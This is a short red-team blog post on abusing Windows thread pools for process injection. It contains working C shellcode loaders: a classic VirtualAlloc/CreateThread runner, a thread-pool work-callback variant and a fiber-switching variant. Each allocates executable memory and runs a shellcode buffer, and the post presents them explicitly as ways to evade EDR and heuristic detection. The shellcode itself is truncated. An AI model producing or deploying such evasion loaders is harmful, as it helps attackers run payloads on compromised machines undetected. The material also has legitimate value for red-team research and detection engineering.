Abusing Thread Pools

10-May-2024

3 minute read

Introduction

If you’re a seasoned red teamer, you’re likely familiar with the various techniques of process injection - where the goal is to execute code on a compromised system discreetly. The use of thread pools in this context is particularly intriguing to me, and I’ll share some insights here.

Typical Process Injection

In this rudimentary example of a process injection, we allocate executable memory within our process, copy shellcode to it, and create a thread that executes it.

int main() {

unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8.....";

void* addr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(addr, buf, sizeof(buf));
HANDLE hThread = CreateThread(NULL, 0, addr, NULL, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
}

However we also know that this has been used ad infinitum and is likely flagged by most forms of heuristic detection. There are therefore countless articles with creative ways to get around this, which brings us to the topic of thread pools.

What are thread pools and why do they exist?

According to Windows documentation, a thread pool is a collection of worker threads that execute asynchronous callbacks on behalf of the application. The thread pool is primarily used to reduce the number of application threads and provide management of the worker threads.

The thread pool architecture consists of the following:

Worker threads that execute the callback functions
Waiter threads that wait on multiple wait handles
A work queue
A default thread pool for each process
A worker factory that manages the worker threads

For example, if we take a look at threads within a newly launched notepad process, we see a number of threads at ntdll!TppWorkerThread. These are default thread pool threads, likely waiting for work:

This is not just limited to standard Windows processes, but even simple custom applications:

If we look into a call stack for one of these thread pool threads, we find the system call ntdll!NtWaitForWorkViaWorkerFactory, which essentially suspends the thread until new work becomes available. According to Windows, the number of actual threads within the thread pool(s) scale up or down depending on the amount of work.

So it turns out we do not have to create a new thread after all. Windows conveniently creates threads that are ready to do work for us, and being system created, gives us the advantage of stealth.

Examples

You could go a hundred different directions with this, but let’s start with a simple example. We can create a work object with CreateThreadPoolWork, and post this object to the thread pool with SubmitThreadPoolWork. A worker thread then calls the callback function defined in WorkCallback, where the injection occurs.

typedef void (*Exec)();

VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work){

	// define shellcode
	unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8.....";

	// allocate memory
	void* addr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	
	// copy shellcode into allocated memory
	memcpy(addr, buf, sizeof(buf));
	
	// cast shellcode memory into a function pointer and execute 
	Exec exec = (Exec*)addr;
	exec();
	
	// cleanup
	VirtualFree(addr, 0, MEM_RELEASE);
}

int main() {
	// create a work object and post to thread pool
	PTP_WORK TpWork = CreateThreadpoolWork(WorkCallback, NULL, NULL);
	SubmitThreadpoolWork(TpWork);

	// wait for return 
	WaitForThreadpoolWorkCallbacks(TpWork, FALSE);
	CloseThreadpoolWork(TpWork);
}

There’s much to experiment with here, for example switching the worker thread into a fiber, and executing shellcode from there.

typedef void (*Exec)();

VOID CALLBACK FiberCallback() {
	
	unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8.....";

	void* addr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(addr, buf, sizeof(buf));
	Exec exec = (Exec)addr;
	exec();
	
	VirtualFree(addr, 0, MEM_RELEASE);
}


VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work) {
	
	// convert thread to fiber, and setup new fiber that calls FiberCallback()
	void* originalFiber = ConvertThreadToFiber(NULL);
	void* newFiber = CreateFiber(0, FiberCallback, NULL);

	// switch to new fiber - FiberCallback() is called - Then return to original fiber 
	SwitchToFiber(newFiber);
	SwitchToFiber(originalFiber);

	// cleanup and return to main
	ConvertFiberToThread();
	DeleteFiber(newFiber);
	
}

int main() {
	PTP_WORK TpWork = CreateThreadpoolWork(WorkCallback, NULL, NULL);
	SubmitThreadpoolWork(TpWork);
	WaitForThreadpoolWorkCallbacks(TpWork, FALSE);
	CloseThreadpoolWork(TpWork);
}

There is some interesting research that takes this much further. For example, Alon Leviev’s talk at Black Hat Europe 2023 showed how the architecture and components of thread pools can be abused to bypass EDR with a high degree of success. Strongly recommend giving the accompanying [^1]:article a read.

Happy experimenting.

Resources